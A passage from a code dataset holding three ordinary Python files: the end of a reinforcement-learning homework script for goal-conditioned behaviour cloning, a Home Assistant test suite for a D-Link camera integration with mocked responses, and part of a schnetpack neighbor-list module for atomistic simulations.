trajectories\n\t\t# obtain either expert or random trajectories\n\t\tif mode == \"random_vanilla\" or mode == \"random_relabel\":\n\t\t\texpert_trajs, expert_actions, expert_original_goals = generate_random_trajs(env, 1000)\n\t\telif mode == \"vanilla\" or mode == \"relabel\":\n\t\t\texpert_trajs, expert_actions = 
shortest_path_expert(env, render=False)\n\t\t\texpert_original_goals = None # no need to record original goals; infer from the last state\n\t\telse:\n\t\t\traise ValueError(\"wrong mode\")\n\n\t\tgcbc = GCBC(env, expert_trajs, expert_actions, num_workers=num_workers, expert_original_goals=expert_original_goals)\n\t\t\n\t\tif mode == 'vanilla':\n\t\t\tgcbc.generate_behavior_cloning_data()\n\t\telif mode == 'relabel':\n\t\t\tgcbc.generate_relabel_data(relabel_one_future=relabel_one_future)\n\t\telif mode == 'random_vanilla':\n\t\t\tgcbc.generate_random_policy_vanilla_data()\n\t\telif mode == 'random_relabel':\n\t\t\tgcbc.generate_random_policy_relabel_data(relabel_one_future=relabel_one_future)\n\t\telse:\n\t\t\traise NotImplementedError()\n\t\tdataset = gcbc.gen_dataset()\n\t\tdataloader = DataLoader(dataset, batch_size=batch_size, shuffle=True, num_workers=gcbc.num_workers)\n\t\tprint(\"total train samples:\", len(gcbc._train_states))\n\t\tfor e in tqdm(range(num_iters)):\n\n\t\t\t# # relabeling at after each iters? No effect on results\n\t\t\t# if mode == 'random_relabel':\n\t\t\t# \tgcbc.generate_random_policy_relabel_data(relabel_one_future=relabel_one_future)\n\t\t\t# elif mode == 'relabel':\n\t\t\t# \tgcbc.generate_relabel_data(relabel_one_future=relabel_one_future)\n\t\t\tloss, acc = gcbc.train(dataloader, num_epochs=num_epochs, batch_size=batch_size)\n\t\t\tsucc = evaluate_gc(env, gcbc_policy(gcbc))\n\t\t\tloss_vec.append(loss)\n\t\t\tacc_vec.append(acc)\n\t\t\tsucc_vec.append(succ)\n\t\t\tif e %10 == 0:\n\t\t\t\tprint(\"iter: %d, loss: %.4f, acc: %.4f, succ: %.4f\" % (e, loss, acc, succ))\n\t\tloss_vecs.append(loss_vec)\n\t\tacc_vecs.append(acc_vec)\n\t\tsucc_vecs.append(succ_vec)\n\n\tloss_vec = np.mean(np.array(loss_vecs), axis = 0).tolist()\n\tacc_vec = np.mean(np.array(acc_vecs), axis = 0).tolist()\n\tsucc_vec = np.mean(np.array(succ_vecs), axis = 0).tolist()\n\n\t### Plot the results\n\tfrom scipy.ndimage import uniform_filter\n\t# you may use uniform_filter(succ_vec, 5) to smooth succ_vec\n\t# plt.figure(figsize=(12, 3))\n\tsmoothed_succ_vec = uniform_filter(succ_vec, 5)\n\tfigure, axes = plt.subplots(2, 2, figsize=(32, 32))\n\tflattened_axes = [axes[i, j] for i in range(2) for j in range(2)]\n\t# WRITE CODE HERE\n\tfor ax, vec, title in zip(flattened_axes, [loss_vec, acc_vec, succ_vec, smoothed_succ_vec], ['loss', 'acc', 'succ', 'succ_smoothed']):\n\t\tax.plot(vec)\n\t\tax.set_title(title)\n\t\tif title == \"succ\":\n\t\t\tax.set_ylim(0, 1)\n\t# END\n\tplt.title('p2_gcbc_%s.png' % mode)\n\tplt.savefig('p2_gcbc_%s.png' % mode, dpi=300)\n\tplt.show()\n\n\nif __name__ == '__main__':\n\t# build env\n\tl, T = 5, 30\n\tenv = FourRooms(l, T)\n\tenv.reset()\n\tprint(\"env action space: \", env.action_space)\n\tprint(\"env map: \", env.map)\n\tenv.s = np.array([1, 1], dtype=int)\n\tenv.g = np.array([0, 8], dtype=int)\n\tprint(\"env sample goal\", env.g)\n\tprint(\"env sample state\", env.s)\n\n\t# test shortest traj\n\t# shortest_traj, shortest_actions = compute_shortest_path(env)\n\t# print(\"shortest_traj: \", shortest_traj)\n\t# print(\"shortest_actions: \", shortest_actions)\n\t# shortest_path_expert(env, render=True)\n\n\t### Visualize the map\n\n\t# env.render_map()\n\t# run_GCBC()","repo_name":"dummyindex/cmu-10703-reinforcement-learning","sub_path":"F22_10703_HW3/impl/p3-templates/GCBC.py","file_name":"GCBC.py","file_ext":"py","file_size_in_byte":17706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} 
+{"seq_id":"28951636457","text":"\"\"\"Tests for the binary sensor module.\"\"\"\nimport asyncio\nimport logging\nimport pytest\n\nfrom datetime import timedelta\nfrom homeassistant.const import (\n CONF_AUTHENTICATION,\n CONF_NAME,\n CONF_PASSWORD,\n CONF_SCAN_INTERVAL,\n CONF_URL,\n CONF_USERNAME,\n CONF_VERIFY_SSL,\n HTTP_BASIC_AUTHENTICATION,\n STATE_UNKNOWN,\n)\nfrom homeassistant.helpers.update_coordinator import DataUpdateCoordinator\nfrom pytest_httpx import IteratorStream\n\nfrom custom_components.nipca_custom.binary_sensor import NipcaMotionSensor, get_sensors\nfrom custom_components.nipca_custom.const import (\n COMMON_INFO,\n MOTION_INFO,\n NOTIFY_STREAM,\n STREAM_INFO,\n)\nfrom custom_components.nipca_custom.nipca import NipcaDevice\n\nfrom tests.conftest import TEST_URL\n\nURL_INFO_LINES = (\n f\"{TEST_URL}\"\n)\n\nCOMMON_INFO_LINES = \"\"\"\nmodel=DCS-2132LB1\nbrand=D-Link\nproduct=Workshop\nversion=2.13\nbuild=03\nhw_version=B\nnipca=1.9.5\nname=Workshop\nlocation=\nmacaddr=B0:C5:54:16:A5:21\nipaddr=192.168.100.63\nnetmask=255.255.255.0\ngateway=192.168.100.1\nipaddr1_v6=\nprefix1_v6=\ngateway_v6=\nwireless=yes\nptz=\nfocus=no\ninputs=1\noutputs=1\nspeaker=yes\nvideoout=no\npir=yes\nicr=yes\nir=yes\nmic=yes\nled=yes\ntd=no\nplaying_music=no\nwhitelightled=no\n\"\"\"\n\nSTREAM_INFO_LINES = \"\"\"\nvideos=MJPEG,H.264\ncodeclist1=MJPEG,H.264\ncodeclist2=MJPEG,H.264\ncodeclist3=MJPEG,H.264\ncodeclist4=MJPEG\naudios=G.711,AAC\naspectratios=16:9,4:3\nresolutions=1280x720,800x448,640x360,480x272,320x176\nresolutionlist1=1280x720,800x448,640x360,480x272,320x176\nresolutionlist2=1280x720,800x448,640x360,480x272,320x176\nresolutionlist3=640x360,320x176\nresolutionlist4=640x360\nvbitrates=4M,2M,1M,512K,256K,200K,128K,64K\nqualitymodes=CBR,Fixquality\nframerates=25,15,7,4,1\nframeratelist1=25,15,7,4,1\nframeratelist2=25,15,7,4,1\nframeratelist3=25,15,7,4,1\nframeratelist4=15\nqualities=Excellent,Good,Standard\nasamplerates=8\nabitrates=64\nmicvol=0...1\ncur_micvol=0\nspeakervol=1...10\ncur_speakervol=7\nvprofilenum=4\nvprofile1=MJPEG\nvprofileurl1=/video/mjpg.cgi?profileid=1\nvprofileres1=800x448\nvprofile2=H.264\nvprofileurl2=/video/ACVS-H264.cgi?profileid=2\nvprofileres2=1280x720\nvprofile3=H.264\nvprofileurl3=/video/ACVS-H264.cgi?profileid=3\nvprofileres3=320x176\nvprofile4=MJPEG\nvprofileurl4=/video/mjpg.cgi?profileid=4\nvprofileres4=640x360\naprofilenum=2\naprofile1=G.711\naprofileurl1=/audio/ACAS-ULAW.cgi\naprofile2=AAC\naprofileurl2=/audio/ACAS-AAC.cgi\nvDprofileurl1=/av2/mjpg.cgi?profileid=1\nvDprofileurl2=/av2/ACVS-H264.cgi?profileid=2\nvDprofileurl3=/av2/ACVS-H264.cgi?profileid=3\nvDprofileurl4=/av2/mjpg.cgi?profileid=4\naDprofileurl1=/av2/ACAS-ULAW.cgi\naDprofileurl2=/av2/ACAS-AAC.cgi\nvban=1|-|1280x720|25|-|-:3|-|800x448,1280x720|-|-|-:3|-|640x360|25|-|-:3|-|-|-|-|6144,8192:3|-|480x272|-|-|-\n\"\"\"\n\nCONFIG_MOTION_INFO_LINES = \"\"\"\nenable=yes\nmbmask=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\nsensitivity=75\npir=yes\npir_sensitivity=50\n\"\"\"\n\nMOTION_INFO_LINES = \"\"\"\nMotionDetectionEnable=1\nMotionDetectionBlockSet=0000000000000000000000000\nMotionDetectionSensitivity=90\nMotionDetectionScheduleMode=0\nMotionDetectionScheduleDay=0\nMotionDetectionScheduleTimeStart=00:00:00\nMotionDetectionScheduleTimeStop=00:00:00\n\"\"\"\n\nSTREAM_LINES = 
b\"\"\"\nmd1=off\nmdv1=0\npir=off\ninput1=off\nrecording=off\noutput1=off\nspeaker=on\nspeaker_occupied=off\nmic=on\nmic_muted=off\nirled=off\nled=on\naudio_detected=off\naudio_detect_val=14\ncameraname=Workshop\n\"\"\"\n\n\ndef test_get_binary_sensors():\n \"\"\"Test parsing sensors attributes.\"\"\"\n raw_data = {\n \"model\": \"DCS-2132LB1\",\n \"brand\": \"D-Link\",\n \"product\": \"test\",\n \"version\": \"2.13\",\n \"build\": \"03\",\n \"hw_version\": \"B\",\n \"nipca\": \"1.9.5\",\n \"name\": \"test\",\n \"location\": \"\",\n \"macaddr\": \"01:23:45:67:89:0A\",\n \"ipaddr\": \"192.168.0.2\",\n \"netmask\": \"255.255.255.0\",\n \"gateway\": \"192.168.0.1\",\n \"ipaddr1_v6\": \"\",\n \"prefix1_v6\": \"\",\n \"gateway_v6\": \"\",\n \"wireless\": \"yes\",\n \"ptz\": \"\",\n \"focus\": \"no\",\n \"inputs\": \"1\",\n \"outputs\": \"1\",\n \"speaker\": \"yes\",\n \"videoout\": \"no\",\n \"pir\": \"yes\",\n \"icr\": \"yes\",\n \"ir\": \"yes\",\n \"mic\": \"yes\",\n \"led\": \"yes\",\n \"td\": \"no\",\n \"playing_music\": \"no\",\n \"whitelightled\": \"no\",\n \"videos\": \"MJPEG,H.264\",\n \"codeclist1\": \"MJPEG,H.264\",\n \"codeclist2\": \"MJPEG,H.264\",\n \"codeclist3\": \"MJPEG,H.264\",\n \"codeclist4\": \"MJPEG\",\n \"audios\": \"G.711,AAC\",\n \"aspectratios\": \"16:9,4:3\",\n \"resolutions\": \"1280x720,800x448,640x360,480x272,320x176\",\n \"resolutionlist1\": \"1280x720,800x448,640x360,480x272,320x176\",\n \"resolutionlist2\": \"1280x720,800x448,640x360,480x272,320x176\",\n \"resolutionlist3\": \"640x360,320x176\",\n \"resolutionlist4\": \"640x360\",\n \"vbitrates\": \"4M,2M,1M,512K,256K,200K,128K,64K\",\n \"qualitymodes\": \"CBR,Fixquality\",\n \"framerates\": \"25,15,7,4,1\",\n \"frameratelist1\": \"25,15,7,4,1\",\n \"frameratelist2\": \"25,15,7,4,1\",\n \"frameratelist3\": \"25,15,7,4,1\",\n \"frameratelist4\": \"15\",\n \"qualities\": \"Excellent,Good,Standard\",\n \"asamplerates\": \"8\",\n \"abitrates\": \"64\",\n \"micvol\": \"0...1\",\n \"cur_micvol\": \"0\",\n \"speakervol\": \"1...10\",\n \"cur_speakervol\": \"7\",\n \"vprofilenum\": \"4\",\n \"vprofile1\": \"MJPEG\",\n \"vprofileurl1\": \"/video/mjpg.cgi?profileid=1\",\n \"vprofileres1\": \"800x448\",\n \"vprofile2\": \"H.264\",\n \"vprofileurl2\": \"/video/ACVS-H264.cgi?profileid=2\",\n \"vprofileres2\": \"1280x720\",\n \"vprofile3\": \"H.264\",\n \"vprofileurl3\": \"/video/ACVS-H264.cgi?profileid=3\",\n \"vprofileres3\": \"320x176\",\n \"vprofile4\": \"MJPEG\",\n \"vprofileurl4\": \"/video/mjpg.cgi?profileid=4\",\n \"vprofileres4\": \"640x360\",\n \"aprofilenum\": \"2\",\n \"aprofile1\": \"G.711\",\n \"aprofileurl1\": \"/audio/ACAS-ULAW.cgi\",\n \"aprofile2\": \"AAC\",\n \"aprofileurl2\": \"/audio/ACAS-AAC.cgi\",\n \"vdprofileurl1\": \"/av2/mjpg.cgi?profileid=1\",\n \"vdprofileurl2\": \"/av2/ACVS-H264.cgi?profileid=2\",\n \"vdprofileurl3\": \"/av2/ACVS-H264.cgi?profileid=3\",\n \"vdprofileurl4\": \"/av2/mjpg.cgi?profileid=4\",\n \"adprofileurl1\": \"/av2/ACAS-ULAW.cgi\",\n \"adprofileurl2\": \"/av2/ACAS-AAC.cgi\",\n \"vban\": \"1|-|1280x720|25|-|-:3|-|800x448,1280x720|-|-|-:3|-|640x360|25|-|-:3|-|-|-|-|6144,8192:3|-|480x272|-|-|-\",\n \"enable\": \"yes\",\n \"mbmask\": \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\",\n \"sensitivity\": \"75\",\n \"pir_sensitivity\": \"50\",\n }\n result = get_sensors(raw_data)\n assert result == [\n (\"motion\", \"md1\"),\n (\"sound\", \"audio_detected\"),\n (\"sound\", \"pir\"),\n (\"light\", 
\"led\"),\n (\"light\", \"irled\"),\n (None, \"input1\"),\n (None, \"output1\"),\n ]\n\n\n@pytest.mark.asyncio\nasync def test_binary_sensor_state(httpx_mock, hass):\n \"\"\"Test binary sensors state update.\"\"\"\n httpx_mock.add_response(url=TEST_URL, text=URL_INFO_LINES)\n httpx_mock.add_response(url=COMMON_INFO.format(TEST_URL), text=COMMON_INFO_LINES)\n httpx_mock.add_response(url=STREAM_INFO.format(TEST_URL), text=STREAM_INFO_LINES)\n httpx_mock.add_response(url=MOTION_INFO[0].format(TEST_URL), text=CONFIG_MOTION_INFO_LINES)\n httpx_mock.add_response(\n url=NOTIFY_STREAM.format(TEST_URL),\n stream=IteratorStream([STREAM_LINES]),\n )\n\n config = {\n CONF_URL: TEST_URL,\n CONF_AUTHENTICATION: HTTP_BASIC_AUTHENTICATION,\n CONF_USERNAME: \"test\",\n CONF_PASSWORD: \"test\",\n CONF_VERIFY_SSL: False,\n CONF_NAME: \"NIPCA Custom\",\n CONF_SCAN_INTERVAL: 10,\n }\n\n device = NipcaDevice(hass, config)\n await device.update_info()\n device.create_listener_task(hass)\n\n logger = logging.getLogger(__name__)\n coordinator = DataUpdateCoordinator(\n hass,\n logger,\n name=\"motion_sensor\",\n update_method=device.update_motion_sensors,\n update_interval=timedelta(seconds=config.get(CONF_SCAN_INTERVAL)),\n )\n device._coordinator = coordinator\n sensors = [\n NipcaMotionSensor(hass, device, coordinator, sensor_name, sensor_class)\n for sensor_class, sensor_name in get_sensors(device._attributes)\n ]\n\n async def wait_until_events_come():\n while len(device._events) < 15:\n await asyncio.sleep(0.1)\n\n await coordinator.async_refresh()\n for sensor in sensors:\n assert sensor.is_on == STATE_UNKNOWN\n\n await wait_until_events_come()\n await coordinator.async_refresh()\n\n for sensor in sensors:\n assert sensor.state != STATE_UNKNOWN\n assert sensor.is_on != STATE_UNKNOWN\n","repo_name":"uncle-yura/nipca_custom","sub_path":"tests/test_binary_sensor.py","file_name":"test_binary_sensor.py","file_ext":"py","file_size_in_byte":8981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"33524329717","text":"import os\nimport torch\nimport shutil\nfrom ase import Atoms\nfrom ase.neighborlist import neighbor_list as ase_neighbor_list\nfrom matscipy.neighbours import neighbour_list as msp_neighbor_list\nfrom .base import Transform\nfrom dirsync import sync\nimport numpy as np\nfrom typing import Optional, Dict, List\n\n__all__ = [\n \"ASENeighborList\",\n \"MatScipyNeighborList\",\n \"TorchNeighborList\",\n \"CountNeighbors\",\n \"CollectAtomTriples\",\n \"CachedNeighborList\",\n \"NeighborListTransform\",\n \"WrapPositions\",\n \"SkinNeighborList\",\n \"FilterNeighbors\",\n]\n\nimport schnetpack as spk\nfrom schnetpack import properties\nimport fasteners\n\n\nclass CacheException(Exception):\n pass\n\n\nclass CachedNeighborList(Transform):\n \"\"\"\n Dynamic caching of neighbor lists.\n This wraps a neighbor list and stores the results the first time it is called\n for a dataset entry with the pid provided by AtomsDataset. Particularly,\n for large systems, this speeds up training significantly.\n\n Note:\n The provided cache location should be unique to the used dataset. Otherwise,\n wrong neighborhoods will be provided. 
The caching location can be reused\n across multiple runs, by setting `keep_cache=True`.\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def __init__(\n self,\n cache_path: str,\n neighbor_list: Transform,\n nbh_transforms: Optional[List[torch.nn.Module]] = None,\n keep_cache: bool = False,\n cache_workdir: str = None,\n ):\n \"\"\"\n Args:\n cache_path: Path of caching directory.\n neighbor_list: the neighbor list to use\n nbh_transforms: transforms for manipulating the neighbor lists\n provided by neighbor_list\n keep_cache: Keep cache at `cache_location` at the end of training, or copy\n built/updated cache there from `cache_workdir` (if set). A pre-existing\n cache at `cache_location` will not be deleted, while a temporary cache\n at `cache_workdir` will always be removed.\n cache_workdir: If this is set, the cache will be build here, e.g. a cluster\n scratch space for faster performance. An existing cache at\n `cache_location` is copied here at the beginning of training, and\n afterwards (if `keep_cache=True`) the final cache is copied to\n `cache_workdir`.\n \"\"\"\n super().__init__()\n self.neighbor_list = neighbor_list\n self.nbh_transforms = nbh_transforms or []\n self.keep_cache = keep_cache\n self.cache_path = cache_path\n self.cache_workdir = cache_workdir\n self.preexisting_cache = os.path.exists(self.cache_path)\n self.has_tmp_workdir = cache_workdir is not None\n\n os.makedirs(cache_path, exist_ok=True)\n\n if self.has_tmp_workdir:\n # cache workdir should be empty to avoid loading nbh lists from earlier runs\n if os.path.exists(cache_workdir):\n raise CacheException(\"The provided `cache_workdir` already exists!\")\n\n # copy existing nbh lists to cache workdir\n if self.preexisting_cache:\n shutil.copytree(cache_path, cache_workdir)\n self.cache_location = cache_workdir\n else:\n # use cache_location to store and load neighborlists\n self.cache_location = cache_path\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n cache_file = os.path.join(\n self.cache_location, f\"cache_{inputs[properties.idx][0]}.pt\"\n )\n\n # try to read cached NBL\n try:\n data = torch.load(cache_file)\n inputs.update(data)\n except IOError:\n # acquire lock for caching\n lock = fasteners.InterProcessLock(\n os.path.join(\n self.cache_location, f\"cache_{inputs[properties.idx][0]}.lock\"\n )\n )\n with lock:\n # retry reading, in case other process finished in the meantime\n try:\n data = torch.load(cache_file)\n inputs.update(data)\n except IOError:\n # now it is save to calculate and cache\n inputs = self.neighbor_list(inputs)\n for nbh_transform in self.nbh_transforms:\n inputs = nbh_transform(inputs)\n data = {\n properties.idx_i: inputs[properties.idx_i],\n properties.idx_j: inputs[properties.idx_j],\n properties.offsets: inputs[properties.offsets],\n }\n torch.save(data, cache_file)\n except Exception as e:\n print(e)\n return inputs\n\n def teardown(self):\n if not self.keep_cache and not self.preexisting_cache:\n try:\n shutil.rmtree(self.cache_path)\n except:\n pass\n\n if self.cache_workdir is not None:\n if self.keep_cache:\n try:\n sync(self.cache_workdir, self.cache_path, \"sync\")\n except:\n pass\n\n try:\n shutil.rmtree(self.cache_workdir)\n except:\n pass\n\n\nclass NeighborListTransform(Transform):\n \"\"\"\n Base class for neighbor lists.\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def __init__(\n self,\n cutoff: float,\n ):\n \"\"\"\n Args:\n cutoff: Cutoff radius for 
neighbor search.\n \"\"\"\n super().__init__()\n self._cutoff = cutoff\n\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n Z = inputs[properties.Z]\n R = inputs[properties.R]\n cell = inputs[properties.cell].view(3, 3)\n pbc = inputs[properties.pbc]\n\n idx_i, idx_j, offset = self._build_neighbor_list(Z, R, cell, pbc, self._cutoff)\n inputs[properties.idx_i] = idx_i.detach()\n inputs[properties.idx_j] = idx_j.detach()\n inputs[properties.offsets] = offset\n return inputs\n\n def _build_neighbor_list(\n self,\n Z: torch.Tensor,\n positions: torch.Tensor,\n cell: torch.Tensor,\n pbc: torch.Tensor,\n cutoff: float,\n ):\n \"\"\"Override with specific neighbor list implementation\"\"\"\n raise NotImplementedError\n\n\nclass ASENeighborList(NeighborListTransform):\n \"\"\"\n Calculate neighbor list using ASE.\n \"\"\"\n\n def _build_neighbor_list(self, Z, positions, cell, pbc, cutoff):\n at = Atoms(numbers=Z, positions=positions, cell=cell, pbc=pbc)\n\n idx_i, idx_j, S = ase_neighbor_list(\"ijS\", at, cutoff, self_interaction=False)\n idx_i = torch.from_numpy(idx_i)\n idx_j = torch.from_numpy(idx_j)\n S = torch.from_numpy(S).to(dtype=positions.dtype)\n offset = torch.mm(S, cell)\n return idx_i, idx_j, offset\n\n\nclass MatScipyNeighborList(NeighborListTransform):\n \"\"\"\n Neighborlist using the efficient implementation of the Matscipy package\n\n References:\n https://github.com/libAtoms/matscipy\n \"\"\"\n\n def _build_neighbor_list(\n self, Z, positions, cell, pbc, cutoff, eps=1e-6, buffer=1.0\n ):\n at = Atoms(numbers=Z, positions=positions, cell=cell, pbc=pbc)\n\n # Add cell if none is present (volume = 0)\n if at.cell.volume < eps:\n # max values - min values along xyz augmented by small buffer for stability\n new_cell = np.ptp(at.positions, axis=0) + buffer\n # Set cell and center\n at.set_cell(new_cell, scale_atoms=False)\n at.center()\n\n # Compute neighborhood\n idx_i, idx_j, S = msp_neighbor_list(\"ijS\", at, cutoff)\n idx_i = torch.from_numpy(idx_i).long()\n idx_j = torch.from_numpy(idx_j).long()\n S = torch.from_numpy(S).to(dtype=positions.dtype)\n offset = torch.mm(S, cell)\n\n return idx_i, idx_j, offset\n\n\nclass SkinNeighborList(Transform):\n \"\"\"\n Neighbor list provider utilizing a cutoff skin for computational efficiency. Wrapper\n around neighbor list classes such as, e.g., ASENeighborList. 
Designed for use cases\n with gradual structural changes such ase MD simulations and structure relaxations.\n\n Note:\n - Not meant to be used for training, since the shuffling of training data\n results in large structural deviations between subsequent training samples.\n - Not transferable between different molecule conformations or varying atom\n indexing.\n \"\"\"\n\n is_preprocessor: bool = True\n is_postprocessor: bool = False\n\n def __init__(\n self,\n neighbor_list: Transform,\n nbh_transforms: Optional[List[torch.nn.Module]] = None,\n cutoff_skin: float = 0.3,\n ):\n \"\"\"\n Args:\n neighbor_list: the neighbor list to use\n nbh_transforms: transforms for manipulating the neighbor lists\n provided by neighbor_list\n cutoff_skin: float\n If no atom has moved more than cutoff_skin/2 since the neighbor list\n has been updated the last time, then the neighbor list is reused.\n This will save some expensive rebuilds of the list.\n \"\"\"\n\n super().__init__()\n\n self.neighbor_list = neighbor_list\n self.cutoff = neighbor_list._cutoff\n self.cutoff_skin = cutoff_skin\n self.neighbor_list._cutoff = self.cutoff + cutoff_skin\n self.nbh_transforms = nbh_transforms or []\n self.distance_calculator = spk.atomistic.PairwiseDistances()\n self.previous_inputs = {}\n\n # @timeit\n def forward(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n\n update_required, inputs = self._update(inputs)\n inputs = self.distance_calculator(inputs)\n inputs = self._remove_neighbors_in_skin(inputs)\n\n return inputs\n\n def reset(self):\n self.previous_inputs = {}\n\n def _remove_neighbors_in_skin(\n self,\n inputs: Dict[str, torch.Tensor],\n ) -> Dict[str, torch.Tensor]:\n\n Rij = inputs[properties.Rij]\n idx_i = inputs[properties.idx_i]\n idx_j = inputs[properties.idx_j]\n offsets = inputs[properties.offsets]\n\n rij = torch.norm(inputs[properties.Rij], dim=-1)\n cidx = torch.nonzero(rij <= self.cutoff).squeeze(-1)\n\n inputs[properties.Rij] = Rij[cidx]\n inputs[properties.idx_i] = idx_i[cidx]\n inputs[properties.idx_j] = idx_j[cidx]\n inputs[properties.offsets] = offsets[cidx]\n\n return inputs\n\n def _update(self, inputs):\n \"\"\"Make sure the list is up-to-date.\"\"\"\n\n # get sample index\n sample_idx = inputs[properties.idx].item()\n\n # check if previous neighbor list exists and make sure that this is not the\n # first update step\n if sample_idx in self.previous_inputs.keys():\n # load previous inputs\n previous_inputs = self.previous_inputs[sample_idx]\n # extract previous structure\n previous_positions = np.array(previous_inputs[properties.R], copy=True)\n previous_cell = np.array(\n previous_inputs[properties.cell].view(3, 3), copy=True\n )\n previous_pbc = np.array(previous_inputs[properties.pbc], copy=True)\n # extract current structure\n positions = inputs[properties.R]\n cell = inputs[properties.cell].view(3, 3)\n pbc = inputs[properties.pbc]\n # check if structure change is sufficiently small to reuse previous neighbor\n # list\n if (\n (previous_pbc == pbc.numpy()).any()\n and (previous_cell == cell.numpy()).any()\n and ((previous_positions - positions.numpy()) ** 2).sum(1).max()\n < 0.25 * self.cutoff_skin**2\n ):\n # reuse previous neighbor list\n inputs[properties.idx_i] = (\n previous_inputs[properties.idx_i].clone()\n )\n inputs[properties.idx_j] = (\n previous_inputs[properties.idx_j].clone()\n )\n inputs[properties.offsets] = (\n previous_inputs[properties.offsets].clone()\n )\n return False, inputs\n\n # build new neighbor list\n inputs = 
self._build(inputs)\n return True, inputs\n\n def _build(self, inputs):\n\n # apply all transforms to obtain new neighbor list\n inputs = self.neighbor_list(inputs)\n for nbh_transform in self.nbh_transforms:\n inputs = nbh_transform(inputs)\n\n # store new reference conformation and remove old one\n sample_idx = inputs[properties.idx].item()\n stored_inputs = {\n properties.R: inputs[properties.R].detach().clone(),\n properties.cell: inputs[properties.cell].detach().clone(),\n properties.pbc: inputs[properties.pbc].detach().clone(),\n properties.idx_i: inputs[properties.idx_i].detach().clone(),\n properties.idx_j: inputs[properties.idx_j].detach().clone(),\n properties.offsets: inputs[properties.offsets].detach().clone(),\n }\n self.previous_inputs.update({sample_idx: stored_inputs})\n\n return inputs\n\n\nclass TorchNeighborList(NeighborListTransform):\n \"\"\"\n Environment provider making use of neighbor lists as implemented in TorchAni\n\n Supports cutoffs and PBCs and can be performed on either CPU or GPU.\n\n References:\n https://github.com/aiqm/torchani/blob/master/torchani/aev.py\n \"\"\"\n\n def _build_neighbor_list(self, Z, positions, cell, pbc, cutoff):\n # Check if shifts are needed for periodic boundary conditions\n if torch.all(pbc == 0):\n shifts = torch.zeros(0, 3, device=cell.device, dtype=torch.long)\n else:\n shifts = self._get_shifts(cell, pbc, cutoff)\n idx_i, idx_j, offset = self._get_neighbor_pairs(positions, cell, shifts, cutoff)\n\n # Create bidirectional id arrays, similar to what the ASE neighbor_list returns\n bi_idx_i = torch.cat((idx_i, idx_j), dim=0)\n bi_idx_j = torch.cat((idx_j, idx_i), dim=0)\n\n # Sort along first dimension (necessary for atom-wise pooling)\n sorted_idx = torch.argsort(bi_idx_i)\n idx_i = bi_idx_i[sorted_idx]\n idx_j = bi_idx_j[sorted_idx]\n\n bi_offset = torch.cat((-offset, offset), dim=0)\n offset = bi_offset[sorted_idx]\n offset = torch.mm(offset.to(cell.dtype), cell)\n\n return idx_i, idx_j, offset\n\n def _get_neighbor_pairs(self, positions, cell, shifts, cutoff):\n \"\"\"Compute pairs of atoms that are neighbors\n Copyright 2018- Xiang Gao and other ANI developers\n (https://github.com/aiqm/torchani/blob/master/torchani/aev.py)\n Arguments:\n positions (:class:`torch.Tensor`): tensor of shape\n (molecules, atoms, 3) for atom coordinates.\n cell (:class:`torch.Tensor`): tensor of shape (3, 3) of the three vectors\n defining unit cell: tensor([[x1, y1, z1], [x2, y2, z2], [x3, y3, z3]])\n shifts (:class:`torch.Tensor`): tensor of shape (?, 3) storing shifts\n \"\"\"\n num_atoms = positions.shape[0]\n all_atoms = torch.arange(num_atoms, device=cell.device)\n\n # 1) Central cell\n pi_center, pj_center = torch.combinations(all_atoms).unbind(-1)\n shifts_center = shifts.new_zeros(pi_center.shape[0], 3)\n\n # 2) cells with shifts\n # shape convention (shift index, molecule index, atom index, 3)\n num_shifts = shifts.shape[0]\n all_shifts = torch.arange(num_shifts, device=cell.device)\n shift_index, pi, pj = torch.cartesian_prod(\n all_shifts, all_atoms, all_atoms\n ).unbind(-1)\n shifts_outside = shifts.index_select(0, shift_index)\n\n # 3) combine results for all cells\n shifts_all = torch.cat([shifts_center, shifts_outside])\n pi_all = torch.cat([pi_center, pi])\n pj_all = torch.cat([pj_center, pj])\n\n # 4) Compute shifts and distance vectors\n shift_values = torch.mm(shifts_all.to(cell.dtype), cell)\n Rij_all = positions[pi_all] - positions[pj_all] + shift_values\n\n # 5) Compute distances, and find all pairs within cutoff\n distances 
= torch.norm(Rij_all, dim=1)\n in_cutoff = torch.nonzero(distances < cutoff, as_tuple=False)\n\n # 6) Reduce tensors to relevant components\n pair_index = in_cutoff.squeeze()\n atom_index_i = pi_all[pair_index]\n atom_index_j = pj_all[pair_index]\n offsets = shifts_all[pair_index]\n\n return atom_index_i, atom_index_j, offsets\n\n def _get_shifts(self, cell, pbc, cutoff):\n \"\"\"Compute the shifts of unit cell along the given cell vectors to make it\n large enough to contain all pairs of neighbor atoms with PBC under\n consideration.\n Copyright 2018- Xiang Gao and other ANI developers\n (https://github.com/aiqm/torchani/blob/master/torchani/aev.py)\n Arguments:\n cell (:class:`torch.Tensor`): tensor of shape (3, 3) of the three\n vectors defining unit cell: tensor([[x1, y1, z1], [x2, y2, z2], [x3, y3, z3]])\n pbc (:class:`torch.Tensor`): boolean vector of size 3 storing\n if pbc is enabled for that direction.\n Returns:\n :class:`torch.Tensor`: long tensor of shifts. the center cell and\n symmetric cells are not included.\n \"\"\"\n reciprocal_cell = cell.inverse().t()\n inverse_lengths = torch.norm(reciprocal_cell, dim=1)\n\n num_repeats = torch.ceil(cutoff * inverse_lengths).long()\n num_repeats = torch.where(\n pbc, num_repeats, torch.Tensor([0], device=cell.device).long()\n )\n\n r1 = torch.arange(1, num_repeats[0] + 1, device=cell.device)\n r2 = torch.arange(1, num_repeats[1] + 1, 